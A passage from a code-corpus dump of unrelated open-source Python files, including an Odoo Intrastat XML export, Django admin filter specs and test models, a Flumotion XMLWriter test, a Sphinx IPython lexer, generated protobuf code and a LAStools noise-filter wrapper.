datas.set('form', 'EXF%sE' % declcode)
datas.set('close', 'true')
intrastatkey = namedtuple("intrastatkey",
['EXTRF', 'EXCNT', 'EXTTA', 'EXREG',
'EXGO', 'EXTPC', 'EXDELTRM'])
entries = {}
sqlreq = """
select
inv_line.id
from
account_invoice_line inv_line
join account_invoice inv on inv_line.invoice_id=inv.id
left join res_country on res_country.id = inv.intrastat_country_id
left join res_partner on res_partner.id = inv.partner_id
left join res_country countrypartner on countrypartner.id = res_partner.country_id
join product_product on inv_line.product_id=product_product.id
join product_template on product_product.product_tmpl_id=product_template.id
where
inv.state in ('open','paid')
and inv.company_id=%s
and not product_template.type='service'
and (res_country.intrastat=true or (inv.intrastat_country_id is null
and countrypartner.intrastat=true))
and ((res_country.code is not null and not res_country.code=%s)
or (res_country.code is null and countrypartner.code is not null
and not countrypartner.code=%s))
and inv.type in (%s, %s)
and to_char(inv.date_invoice, 'YYYY')=%s
and to_char(inv.date_invoice, 'MM')=%s
"""
cr.execute(sqlreq, (company.id, company.partner_id.country_id.code,
company.partner_id.country_id.code, mode1, mode2,
decl_datas.year, decl_datas.month))
lines = cr.fetchall()
invoicelines_ids = [rec[0] for rec in lines]
invoicelines = invoiceline_mod.browse(cr, uid, invoicelines_ids, context=context)
for inv_line in invoicelines:
#Check type of transaction
if inv_line.invoice_id.intrastat_transaction_id:
extta = inv_line.invoice_id.intrastat_transaction_id.code
else:
extta = "1"
#Check country
if inv_line.invoice_id.intrastat_country_id:
excnt = inv_line.invoice_id.intrastat_country_id.code
else:
excnt = inv_line.invoice_id.partner_id.country_id.code
#Check region
#If purchase, comes from purchase order, linked to a location,
#which is linked to the warehouse
#if sales, the sale order is linked to the warehouse
#if sales, from a delivery order, linked to a location,
#which is linked to the warehouse
#If none found, get the company one.
exreg = None
if inv_line.invoice_id.type in ('in_invoice', 'in_refund'):
#comes from purchase
POL = self.pool['purchase.order.line']
poline_ids = POL.search(
cr, uid, [('invoice_lines', 'in', inv_line.id)], context=context)
if poline_ids:
purchaseorder = POL.browse(cr, uid, poline_ids[0], context=context).order_id
region_id = warehouse_mod.get_regionid_from_locationid(
cr, uid, purchaseorder.location_id.id, context=context)
if region_id:
exreg = region_mod.browse(cr, uid, region_id).code
elif inv_line.invoice_id.type in ('out_invoice', 'out_refund'):
#comes from sales
soline_ids = self.pool['sale.order.line'].search(
cr, uid, [('invoice_lines', 'in', inv_line.id)], context=context)
if soline_ids:
saleorder = self.pool['sale.order.line'].browse(
cr, uid, soline_ids[0], context=context).order_id
if saleorder and saleorder.warehouse_id and saleorder.warehouse_id.region_id:
exreg = region_mod.browse(
cr, uid, saleorder.warehouse_id.region_id.id, context=context).code
if not exreg:
if company.region_id:
exreg = company.region_id.code
else:
self._company_warning(
cr, uid,
_('The Intrastat Region of the selected company is not set, '
'please make sure to configure it first.'),
context=context)
#Check commodity codes
intrastat_id = product_mod.get_intrastat_recursively(
cr, uid, inv_line.product_id.id, context=context)
if intrastat_id:
exgo = intrastatcode_mod.browse(cr, uid, intrastat_id, context=context).name
else:
raise exceptions.Warning(
_('Product "%s" has no intrastat code, please configure it') %
inv_line.product_id.display_name)
#In extended mode, 2 more fields required
if extendedmode:
#Check means of transport
if inv_line.invoice_id.transport_mode_id:
extpc = inv_line.invoice_id.transport_mode_id.code
elif company.transport_mode_id:
extpc = company.transport_mode_id.code
else:
self._company_warning(
cr, uid,
_('The default Intrastat transport mode of your company '
'is not set, please make sure to configure it first.'),
context=context)
#Check incoterm
if inv_line.invoice_id.incoterm_id:
exdeltrm = inv_line.invoice_id.incoterm_id.code
elif company.incoterm_id:
exdeltrm = company.incoterm_id.code
else:
self._company_warning(
cr, uid,
_('The default Incoterm of your company is not set, '
'please make sure to configure it first.'),
context=context)
else:
extpc = ""
exdeltrm = ""
linekey = intrastatkey(EXTRF=declcode, EXCNT=excnt,
EXTTA=extta, EXREG=exreg, EXGO=exgo,
EXTPC=extpc, EXDELTRM=exdeltrm)
#We have the key
#calculate amounts
if inv_line.price_unit and inv_line.quantity:
amount = inv_line.price_unit * inv_line.quantity
else:
amount = 0
if (not inv_line.uos_id.category_id
or not inv_line.product_id.uom_id.category_id
or inv_line.uos_id.category_id.id != inv_line.product_id.uom_id.category_id.id):
weight = inv_line.product_id.weight_net * inv_line.quantity
else:
weight = (inv_line.product_id.weight_net *
inv_line.quantity * inv_line.uos_id.factor)
if (not inv_line.uos_id.category_id or not inv_line.product_id.uom_id.category_id
or inv_line.uos_id.category_id.id != inv_line.product_id.uom_id.category_id.id):
supply_units = inv_line.quantity
else:
supply_units = inv_line.quantity * inv_line.uos_id.factor
amounts = entries.setdefault(linekey, (0, 0, 0))
amounts = (amounts[0] + amount, amounts[1] + weight, amounts[2] + supply_units)
entries[linekey] = amounts
numlgn = 0
for linekey in entries:
numlgn += 1
amounts = entries[linekey]
item = ET.SubElement(datas, 'Item')
self._set_Dim(item, 'EXSEQCODE', unicode(numlgn))
self._set_Dim(item, 'EXTRF', unicode(linekey.EXTRF))
self._set_Dim(item, 'EXCNT', unicode(linekey.EXCNT))
self._set_Dim(item, 'EXTTA', unicode(linekey.EXTTA))
self._set_Dim(item, 'EXREG', unicode(linekey.EXREG))
self._set_Dim(item, 'EXTGO', unicode(linekey.EXGO))
if extendedmode:
self._set_Dim(item, 'EXTPC', unicode(linekey.EXTPC))
self._set_Dim(item, 'EXDELTRM', unicode(linekey.EXDELTRM))
self._set_Dim(item, 'EXTXVAL', unicode(round(amounts[0], 0)).replace(".", ","))
self._set_Dim(item, 'EXWEIGHT', unicode(round(amounts[1], 0)).replace(".", ","))
self._set_Dim(item, 'EXUNITS', unicode(round(amounts[2], 0)).replace(".", ","))
if numlgn == 0:
#no datas
datas.set('action', 'nihil')
return decl
def _set_Dim(self, item, prop, value):
dim = ET.SubElement(item, 'Dim')
dim.set('prop', prop)
dim.text = value
|
virtualopensystems/neutron | refs/heads/master | neutron/tests/unit/services/firewall/agents/varmour/__init__.py | 140 | # Copyright 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
|
flyapen/UgFlu | refs/heads/master | flumotion/test/test_common_xmlwriter.py | 3 | # -*- Mode: Python; test-case-name: flumotion.test.test_common_componentui -*-
# vi:si:et:sw=4:sts=4:ts=4
#
# Flumotion - a streaming media server
# Copyright (C) 2008 Fluendo, S.L. (www.fluendo.com).
# All rights reserved.
# This file may be distributed and/or modified under the terms of
# the GNU General Public License version 2 as published by
# the Free Software Foundation.
# This file is distributed without any warranty; without even the implied
# warranty of merchantability or fitness for a particular purpose.
# See "LICENSE.GPL" in the source distribution for more information.
# Licensees having purchased or holding a valid Flumotion Advanced
# Streaming Server license may use this file in accordance with the
# Flumotion Advanced Streaming Server Commercial License Agreement.
# See "LICENSE.Flumotion" in the source distribution for more information.
# Headers in this file shall remain intact.
from flumotion.common.testsuite import TestCase
from flumotion.common.xmlwriter import cmpComponentType, XMLWriter
class TestXMLWriter(TestCase):
def testIndent(self):
xw = XMLWriter()
xw.pushTag('tag',
[('long-attribute-name-number-one', 'value'),
('long-attribute-name-number-two', 'value'),
('long-attribute-name-number-three', 'value')])
xw.popTag()
self.assertEquals(
xw.getXML(),
('<tag long-attribute-name-number-one="value"\n'
' long-attribute-name-number-two="value"\n'
' long-attribute-name-number-three="value">\n'
'</tag>\n'))
def testPush(self):
xw = XMLWriter()
xw.pushTag('first')
self.assertEquals(xw.getXML(), "<first>\n")
xw.popTag()
self.assertEquals(xw.getXML(), "<first>\n</first>\n")
xw = XMLWriter()
xw.pushTag('first', [('attr1', 'a'),
('attr2', 'b')])
self.assertEquals(xw.getXML(), '<first attr1="a" attr2="b">\n')
xw.popTag()
def testWriteLine(self):
xw = XMLWriter()
xw.writeLine('foo')
self.assertEquals(xw.getXML(), 'foo\n')
xw.pushTag('tag')
self.assertEquals(xw.getXML(), 'foo\n<tag>\n')
xw.writeLine('bar')
self.assertEquals(xw.getXML(), 'foo\n<tag>\n bar\n')
def testWriteTag(self):
xw = XMLWriter()
xw.pushTag('tag')
xw.writeTag('tag2')
self.assertEquals(xw.getXML(),
'<tag>\n <tag2/>\n')
def testWriteTagAttr(self):
xw = XMLWriter()
xw.pushTag('tag')
xw.writeTag('tag2', [('attr', 'value')])
self.assertEquals(xw.getXML(),
'<tag>\n <tag2 attr="value"/>\n')
def testWriteTagAttrData(self):
xw = XMLWriter()
xw.pushTag('tag')
xw.writeTag('tag2', [('attr', 'value')], data='data')
self.assertEquals(xw.getXML(),
'<tag>\n <tag2 attr="value">data</tag2>\n')
def testWriteTagData(self):
xw = XMLWriter()
xw.pushTag('tag')
xw.writeTag('tag2', data='data')
self.assertEquals(xw.getXML(),
'<tag>\n <tag2>data</tag2>\n')
class TestCompareComponentTypes(TestCase):
def testEncoderMuxer(self):
components = ['ogg-muxer',
'vorbis-encoder',
'theora-encoder']
components.sort(cmp=cmpComponentType)
self.assertEquals(components,
['theora-encoder',
'vorbis-encoder',
'ogg-muxer'],
components)
def testProducerEncoderMuxer(self):
components = ['ogg-muxer',
'vorbis-encoder',
'videotest-producer',
'theora-encoder']
components.sort(cmp=cmpComponentType)
self.assertEquals(components,
['videotest-producer',
'theora-encoder',
'vorbis-encoder',
'ogg-muxer'],
components)
def testComplete(self):
components = ['ogg-muxer',
'http-streamer',
'overlay-converter',
'vorbis-encoder',
'videotest-producer',
'dirac-encoder',
'audiotest-producer']
components.sort(cmp=cmpComponentType)
self.assertEquals(components,
['audiotest-producer',
'videotest-producer',
'overlay-converter',
'dirac-encoder',
'vorbis-encoder',
'ogg-muxer',
'http-streamer'],
components)
|
asedunov/intellij-community | refs/heads/master | python/lib/Lib/site-packages/django/contrib/admin/filterspecs.py | 78 | """
FilterSpec encapsulates the logic for displaying filters in the Django admin.
Filters are specified in models with the "list_filter" option.
Each filter subclass knows how to display a filter for a field that passes a
certain test -- e.g. being a DateField or ForeignKey.
"""
from django.db import models
from django.utils.encoding import smart_unicode, iri_to_uri
from django.utils.translation import ugettext as _
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.contrib.admin.util import get_model_from_relation, \
reverse_field_path, get_limit_choices_to_from_path
import datetime
class FilterSpec(object):
filter_specs = []
def __init__(self, f, request, params, model, model_admin,
field_path=None):
self.field = f
self.params = params
self.field_path = field_path
if field_path is None:
if isinstance(f, models.related.RelatedObject):
self.field_path = f.var_name
else:
self.field_path = f.name
def register(cls, test, factory):
cls.filter_specs.append((test, factory))
register = classmethod(register)
def create(cls, f, request, params, model, model_admin, field_path=None):
for test, factory in cls.filter_specs:
if test(f):
return factory(f, request, params, model, model_admin,
field_path=field_path)
create = classmethod(create)
def has_output(self):
return True
def choices(self, cl):
raise NotImplementedError()
def title(self):
return self.field.verbose_name
def output(self, cl):
t = []
if self.has_output():
t.append(_(u'<h3>By %s:</h3>\n<ul>\n') % escape(self.title()))
for choice in self.choices(cl):
t.append(u'<li%s><a href="%s">%s</a></li>\n' % \
((choice['selected'] and ' class="selected"' or ''),
iri_to_uri(choice['query_string']),
choice['display']))
t.append('</ul>\n\n')
return mark_safe("".join(t))
class RelatedFilterSpec(FilterSpec):
def __init__(self, f, request, params, model, model_admin,
field_path=None):
super(RelatedFilterSpec, self).__init__(
f, request, params, model, model_admin, field_path=field_path)
other_model = get_model_from_relation(f)
if isinstance(f, (models.ManyToManyField,
models.related.RelatedObject)):
# no direct field on this model, get name from other model
self.lookup_title = other_model._meta.verbose_name
else:
self.lookup_title = f.verbose_name # use field name
rel_name = other_model._meta.pk.name
self.lookup_kwarg = '%s__%s__exact' % (self.field_path, rel_name)
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
self.lookup_choices = f.get_choices(include_blank=False)
def has_output(self):
return len(self.lookup_choices) > 1
def title(self):
return self.lookup_title
def choices(self, cl):
yield {'selected': self.lookup_val is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All')}
for pk_val, val in self.lookup_choices:
yield {'selected': self.lookup_val == smart_unicode(pk_val),
'query_string': cl.get_query_string({self.lookup_kwarg: pk_val}),
'display': val}
FilterSpec.register(lambda f: (
hasattr(f, 'rel') and bool(f.rel) or
isinstance(f, models.related.RelatedObject)), RelatedFilterSpec)
class ChoicesFilterSpec(FilterSpec):
def __init__(self, f, request, params, model, model_admin,
field_path=None):
super(ChoicesFilterSpec, self).__init__(f, request, params, model,
model_admin,
field_path=field_path)
self.lookup_kwarg = '%s__exact' % self.field_path
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
def choices(self, cl):
yield {'selected': self.lookup_val is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All')}
for k, v in self.field.flatchoices:
yield {'selected': smart_unicode(k) == self.lookup_val,
'query_string': cl.get_query_string({self.lookup_kwarg: k}),
'display': v}
FilterSpec.register(lambda f: bool(f.choices), ChoicesFilterSpec)
class DateFieldFilterSpec(FilterSpec):
def __init__(self, f, request, params, model, model_admin,
field_path=None):
super(DateFieldFilterSpec, self).__init__(f, request, params, model,
model_admin,
field_path=field_path)
self.field_generic = '%s__' % self.field_path
self.date_params = dict([(k, v) for k, v in params.items() if k.startswith(self.field_generic)])
today = datetime.date.today()
one_week_ago = today - datetime.timedelta(days=7)
today_str = isinstance(self.field, models.DateTimeField) and today.strftime('%Y-%m-%d 23:59:59') or today.strftime('%Y-%m-%d')
self.links = (
(_('Any date'), {}),
(_('Today'), {'%s__year' % self.field_path: str(today.year),
'%s__month' % self.field_path: str(today.month),
'%s__day' % self.field_path: str(today.day)}),
(_('Past 7 days'), {'%s__gte' % self.field_path:
one_week_ago.strftime('%Y-%m-%d'),
'%s__lte' % self.field_path: today_str}),
(_('This month'), {'%s__year' % self.field_path: str(today.year),
'%s__month' % self.field_path: str(today.month)}),
(_('This year'), {'%s__year' % self.field_path: str(today.year)})
)
def title(self):
return self.field.verbose_name
def choices(self, cl):
for title, param_dict in self.links:
yield {'selected': self.date_params == param_dict,
'query_string': cl.get_query_string(param_dict, [self.field_generic]),
'display': title}
FilterSpec.register(lambda f: isinstance(f, models.DateField), DateFieldFilterSpec)
class BooleanFieldFilterSpec(FilterSpec):
def __init__(self, f, request, params, model, model_admin,
field_path=None):
super(BooleanFieldFilterSpec, self).__init__(f, request, params, model,
model_admin,
field_path=field_path)
self.lookup_kwarg = '%s__exact' % self.field_path
self.lookup_kwarg2 = '%s__isnull' % self.field_path
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
self.lookup_val2 = request.GET.get(self.lookup_kwarg2, None)
def title(self):
return self.field.verbose_name
def choices(self, cl):
for k, v in ((_('All'), None), (_('Yes'), '1'), (_('No'), '0')):
yield {'selected': self.lookup_val == v and not self.lookup_val2,
'query_string': cl.get_query_string({self.lookup_kwarg: v}, [self.lookup_kwarg2]),
'display': k}
if isinstance(self.field, models.NullBooleanField):
yield {'selected': self.lookup_val2 == 'True',
'query_string': cl.get_query_string({self.lookup_kwarg2: 'True'}, [self.lookup_kwarg]),
'display': _('Unknown')}
FilterSpec.register(lambda f: isinstance(f, models.BooleanField) or isinstance(f, models.NullBooleanField), BooleanFieldFilterSpec)
# This should be registered last, because it's a last resort. For example,
# if a field is eligible to use the BooleanFieldFilterSpec, that'd be much
# more appropriate, and the AllValuesFilterSpec won't get used for it.
class AllValuesFilterSpec(FilterSpec):
def __init__(self, f, request, params, model, model_admin,
field_path=None):
super(AllValuesFilterSpec, self).__init__(f, request, params, model,
model_admin,
field_path=field_path)
self.lookup_val = request.GET.get(self.field_path, None)
parent_model, reverse_path = reverse_field_path(model, field_path)
queryset = parent_model._default_manager.all()
# optional feature: limit choices base on existing relationships
# queryset = queryset.complex_filter(
# {'%s__isnull' % reverse_path: False})
limit_choices_to = get_limit_choices_to_from_path(model, field_path)
queryset = queryset.filter(limit_choices_to)
self.lookup_choices = \
queryset.distinct().order_by(f.name).values(f.name)
def title(self):
return self.field.verbose_name
def choices(self, cl):
yield {'selected': self.lookup_val is None,
'query_string': cl.get_query_string({}, [self.field_path]),
'display': _('All')}
for val in self.lookup_choices:
val = smart_unicode(val[self.field.name])
yield {'selected': self.lookup_val == val,
'query_string': cl.get_query_string({self.field_path: val}),
'display': val}
FilterSpec.register(lambda f: True, AllValuesFilterSpec)
|
makinacorpus/django | refs/heads/master | tests/defer_regress/models.py | 59 | """
Regression tests for defer() / only() behavior.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Item(models.Model):
name = models.CharField(max_length=15)
text = models.TextField(default="xyzzy")
value = models.IntegerField()
other_value = models.IntegerField(default=0)
def __str__(self):
return self.name
class RelatedItem(models.Model):
item = models.ForeignKey(Item)
class Child(models.Model):
name = models.CharField(max_length=10)
value = models.IntegerField()
@python_2_unicode_compatible
class Leaf(models.Model):
name = models.CharField(max_length=10)
child = models.ForeignKey(Child)
second_child = models.ForeignKey(Child, related_name="other", null=True)
value = models.IntegerField(default=42)
def __str__(self):
return self.name
class ResolveThis(models.Model):
num = models.FloatField()
name = models.CharField(max_length=16)
class Proxy(Item):
class Meta:
proxy = True
@python_2_unicode_compatible
class SimpleItem(models.Model):
name = models.CharField(max_length=15)
value = models.IntegerField()
def __str__(self):
return self.name
class Feature(models.Model):
item = models.ForeignKey(SimpleItem)
class SpecialFeature(models.Model):
feature = models.ForeignKey(Feature)
class OneToOneItem(models.Model):
item = models.OneToOneField(Item, related_name="one_to_one_item")
name = models.CharField(max_length=15)
class ItemAndSimpleItem(models.Model):
item = models.ForeignKey(Item)
simple = models.ForeignKey(SimpleItem)
class Profile(models.Model):
profile1 = models.CharField(max_length=1000, default='profile1')
class Location(models.Model):
location1 = models.CharField(max_length=1000, default='location1')
class Item(models.Model):
pass
class Request(models.Model):
profile = models.ForeignKey(Profile, null=True, blank=True)
location = models.ForeignKey(Location)
items = models.ManyToManyField(Item)
request1 = models.CharField(default='request1', max_length=1000)
request2 = models.CharField(default='request2', max_length=1000)
request3 = models.CharField(default='request3', max_length=1000)
request4 = models.CharField(default='request4', max_length=1000)
|
dex4er/django | refs/heads/1.6.x | tests/defer_regress/models.py | 59 | """
Regression tests for defer() / only() behavior.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Item(models.Model):
name = models.CharField(max_length=15)
text = models.TextField(default="xyzzy")
value = models.IntegerField()
other_value = models.IntegerField(default=0)
def __str__(self):
return self.name
class RelatedItem(models.Model):
item = models.ForeignKey(Item)
class Child(models.Model):
name = models.CharField(max_length=10)
value = models.IntegerField()
@python_2_unicode_compatible
class Leaf(models.Model):
name = models.CharField(max_length=10)
child = models.ForeignKey(Child)
second_child = models.ForeignKey(Child, related_name="other", null=True)
value = models.IntegerField(default=42)
def __str__(self):
return self.name
class ResolveThis(models.Model):
num = models.FloatField()
name = models.CharField(max_length=16)
class Proxy(Item):
class Meta:
proxy = True
@python_2_unicode_compatible
class SimpleItem(models.Model):
name = models.CharField(max_length=15)
value = models.IntegerField()
def __str__(self):
return self.name
class Feature(models.Model):
item = models.ForeignKey(SimpleItem)
class SpecialFeature(models.Model):
feature = models.ForeignKey(Feature)
class OneToOneItem(models.Model):
item = models.OneToOneField(Item, related_name="one_to_one_item")
name = models.CharField(max_length=15)
class ItemAndSimpleItem(models.Model):
item = models.ForeignKey(Item)
simple = models.ForeignKey(SimpleItem)
class Profile(models.Model):
profile1 = models.CharField(max_length=1000, default='profile1')
class Location(models.Model):
location1 = models.CharField(max_length=1000, default='location1')
class Item(models.Model):
pass
class Request(models.Model):
profile = models.ForeignKey(Profile, null=True, blank=True)
location = models.ForeignKey(Location)
items = models.ManyToManyField(Item)
request1 = models.CharField(default='request1', max_length=1000)
request2 = models.CharField(default='request2', max_length=1000)
request3 = models.CharField(default='request3', max_length=1000)
request4 = models.CharField(default='request4', max_length=1000)
|
yade/trunk | refs/heads/master | doc/sphinx/ipython_console_highlighting.py | 112 | """reST directive for syntax-highlighting ipython interactive sessions.
XXX - See what improvements can be made based on the new (as of Sept 2009)
'pycon' lexer for the python console. At the very least it will give better
highlighted tracebacks.
"""
#-----------------------------------------------------------------------------
# Needed modules
# Standard library
import re
# Third party
from pygments.lexer import Lexer, do_insertions
from pygments.lexers.agile import (PythonConsoleLexer, PythonLexer,
PythonTracebackLexer)
from pygments.token import Comment, Generic
from sphinx import highlighting
#-----------------------------------------------------------------------------
# Global constants
line_re = re.compile('.*?\n')
#-----------------------------------------------------------------------------
# Code begins - classes and functions
class IPythonConsoleLexer(Lexer):
"""
For IPython console output or doctests, such as:
.. sourcecode:: ipython
In [1]: a = 'foo'
In [2]: a
Out[2]: 'foo'
In [3]: print a
foo
In [4]: 1 / 0
Notes:
- Tracebacks are not currently supported.
- It assumes the default IPython prompts, not customized ones.
"""
name = 'IPython console session'
aliases = ['ipython']
mimetypes = ['text/x-ipython-console']
input_prompt = re.compile("(In \[[0-9]+\]: )|( \.\.\.+:)")
output_prompt = re.compile("(Out\[[0-9]+\]: )|( \.\.\.+:)")
continue_prompt = re.compile(" \.\.\.+:")
tb_start = re.compile("\-+")
def get_tokens_unprocessed(self, text):
pylexer = PythonLexer(**self.options)
tblexer = PythonTracebackLexer(**self.options)
curcode = ''
insertions = []
for match in line_re.finditer(text):
line = match.group()
input_prompt = self.input_prompt.match(line)
continue_prompt = self.continue_prompt.match(line.rstrip())
output_prompt = self.output_prompt.match(line)
if line.startswith("#"):
insertions.append((len(curcode),
[(0, Comment, line)]))
elif input_prompt is not None:
insertions.append((len(curcode),
[(0, Generic.Prompt, input_prompt.group())]))
curcode += line[input_prompt.end():]
elif continue_prompt is not None:
insertions.append((len(curcode),
[(0, Generic.Prompt, continue_prompt.group())]))
curcode += line[continue_prompt.end():]
elif output_prompt is not None:
# Use the 'error' token for output. We should probably make
# our own token, but error is typicaly in a bright color like
# red, so it works fine for our output prompts.
insertions.append((len(curcode),
[(0, Generic.Error, output_prompt.group())]))
curcode += line[output_prompt.end():]
else:
if curcode:
for item in do_insertions(insertions,
pylexer.get_tokens_unprocessed(curcode)):
yield item
curcode = ''
insertions = []
yield match.start(), Generic.Output, line
if curcode:
for item in do_insertions(insertions,
pylexer.get_tokens_unprocessed(curcode)):
yield item
def setup(app):
"""Setup as a sphinx extension."""
# This is only a lexer, so adding it below to pygments appears sufficient.
# But if somebody knows that the right API usage should be to do that via
# sphinx, by all means fix it here. At least having this setup.py
# suppresses the sphinx warning we'd get without it.
pass
#-----------------------------------------------------------------------------
# Register the extension as a valid pygments lexer
highlighting.lexers['ipython'] = IPythonConsoleLexer()
|
benesch/adspygoogle.dfp | refs/heads/master | adspygoogle/SOAPpy/wstools/__init__.py | 14 | #! /usr/bin/env python
"""WSDL parsing services package for Web Services for Python."""
ident = "$Id: __init__.py,v 1.11 2004/12/07 15:54:53 blunck2 Exp $"
import WSDLTools
import XMLname
import logging
|
polzy/PokeManager | refs/heads/master | pogo/POGOProtos/Settings/Master/Pokemon/StatsAttributes_pb2.py | 16 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Settings/Master/Pokemon/StatsAttributes.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Settings/Master/Pokemon/StatsAttributes.proto',
package='POGOProtos.Settings.Master.Pokemon',
syntax='proto3',
serialized_pb=_b('\n8POGOProtos/Settings/Master/Pokemon/StatsAttributes.proto\x12\"POGOProtos.Settings.Master.Pokemon\"n\n\x0fStatsAttributes\x12\x14\n\x0c\x62\x61se_stamina\x18\x01 \x01(\x05\x12\x13\n\x0b\x62\x61se_attack\x18\x02 \x01(\x05\x12\x14\n\x0c\x62\x61se_defense\x18\x03 \x01(\x05\x12\x1a\n\x12\x64odge_energy_delta\x18\x08 \x01(\x05\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_STATSATTRIBUTES = _descriptor.Descriptor(
name='StatsAttributes',
full_name='POGOProtos.Settings.Master.Pokemon.StatsAttributes',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='base_stamina', full_name='POGOProtos.Settings.Master.Pokemon.StatsAttributes.base_stamina', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='base_attack', full_name='POGOProtos.Settings.Master.Pokemon.StatsAttributes.base_attack', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='base_defense', full_name='POGOProtos.Settings.Master.Pokemon.StatsAttributes.base_defense', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dodge_energy_delta', full_name='POGOProtos.Settings.Master.Pokemon.StatsAttributes.dodge_energy_delta', index=3,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=96,
serialized_end=206,
)
DESCRIPTOR.message_types_by_name['StatsAttributes'] = _STATSATTRIBUTES
StatsAttributes = _reflection.GeneratedProtocolMessageType('StatsAttributes', (_message.Message,), dict(
DESCRIPTOR = _STATSATTRIBUTES,
__module__ = 'POGOProtos.Settings.Master.Pokemon.StatsAttributes_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Settings.Master.Pokemon.StatsAttributes)
))
_sym_db.RegisterMessage(StatsAttributes)
# @@protoc_insertion_point(module_scope)
|
hnaoto/stuff | refs/heads/master | stuff/migrations/0005_user_auth.py | 2 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('stuff', '0004_auto_20151021_2309'),
]
operations = [
migrations.AddField(
model_name='user',
name='auth',
field=models.ForeignKey(unique=True, null=True, to='stuff.Authenticator', blank=True),
preserve_default=True,
),
]
|
kennedyshead/home-assistant | refs/heads/dev | homeassistant/components/mqtt_json/__init__.py | 36 | """The mqtt_json component."""
|
SebDieBln/QGIS | refs/heads/master | python/plugins/processing/algs/lidar/lastools/lasnoisePro.py | 12 | # -*- coding: utf-8 -*-
"""
***************************************************************************
lasnoisePro.py
---------------------
Date : October 2014
Copyright : (C) 2014 by Martin Isenburg
Email : martin near rapidlasso point com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Martin Isenburg'
__date__ = 'October 2014'
__copyright__ = '(C) 2014, Martin Isenburg'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from LAStoolsUtils import LAStoolsUtils
from LAStoolsAlgorithm import LAStoolsAlgorithm
from processing.core.parameters import ParameterNumber
from processing.core.parameters import ParameterSelection
class lasnoisePro(LAStoolsAlgorithm):
ISOLATED = "ISOLATED"
STEP_XY = "STEP_XY"
STEP_Z = "STEP_Z"
OPERATION = "OPERATION"
OPERATIONS = ["classify", "remove"]
CLASSIFY_AS = "CLASSIFY_AS"
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('lasnoisePro')
self.group, self.i18n_group = self.trAlgorithm('LAStools Production')
self.addParametersPointInputFolderGUI()
self.addParameter(ParameterNumber(lasnoisePro.ISOLATED,
self.tr("isolated if surrounding cells have only"), 0, None, 5))
self.addParameter(ParameterNumber(lasnoisePro.STEP_XY,
self.tr("resolution of isolation grid in xy"), 0, None, 4.0))
self.addParameter(ParameterNumber(lasnoisePro.STEP_Z,
self.tr("resolution of isolation grid in z"), 0, None, 4.0))
self.addParameter(ParameterSelection(lasnoisePro.OPERATION,
self.tr("what to do with isolated points"), lasnoisePro.OPERATIONS, 0))
self.addParameter(ParameterNumber(lasnoisePro.CLASSIFY_AS,
self.tr("classify as"), 0, None, 7))
self.addParametersOutputDirectoryGUI()
self.addParametersOutputAppendixGUI()
self.addParametersPointOutputFormatGUI()
self.addParametersAdditionalGUI()
self.addParametersCoresGUI()
self.addParametersVerboseGUI()
def processAlgorithm(self, progress):
commands = [os.path.join(LAStoolsUtils.LAStoolsPath(), "bin", "lasnoise")]
self.addParametersVerboseCommands(commands)
self.addParametersPointInputFolderCommands(commands)
isolated = self.getParameterValue(lasnoisePro.ISOLATED)
commands.append("-isolated")
commands.append(unicode(isolated))
step_xy = self.getParameterValue(lasnoisePro.STEP_XY)
commands.append("-step_xy")
commands.append(unicode(step_xy))
step_z = self.getParameterValue(lasnoisePro.STEP_Z)
commands.append("-step_z")
commands.append(unicode(step_z))
operation = self.getParameterValue(lasnoisePro.OPERATION)
if operation != 0:
commands.append("-remove_noise")
else:
commands.append("-classify_as")
